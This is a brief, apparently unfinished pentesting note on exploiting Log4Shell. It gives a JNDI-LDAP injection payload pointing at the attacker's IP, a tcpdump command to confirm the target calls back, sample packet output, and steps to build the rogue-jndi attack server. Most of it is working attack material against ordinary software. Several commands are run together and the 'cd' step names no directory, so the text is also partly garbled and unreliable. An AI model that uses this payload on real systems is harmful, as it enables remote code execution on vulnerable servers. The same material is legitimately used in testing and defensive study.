CVE - Log4Shell (WIP)
# Insert this payload on the vulnerable point
${jndi:ldap://$IP/test} # Specify your IP
# Set TCP listener on our machine
sudo tcpdump -i $interface port $LDAPport # Specify the Network Interface you are using and the port running LDAP which by default is 389
# If it works, we will see a result like this
01:02:56.775423 IP $TargetIP.48214 > $OurIP.ldap: Flags [S], seq 1793598680, win 64240, options [mss 1340,sackOK,TS val 2750652936 ecr 0,nop,wscale 7], length 0
01:02:56.775456 IP $OurIP.ldap > $TargetIP.48214: Flags [R.], seq 0, ack 1793598681, win 0, length 0sudo apt install maven
sudo apt install openjdk-24-jdkgit clone https://github.com/veracode-research/rogue-jndi
cd
mvn packageLast updated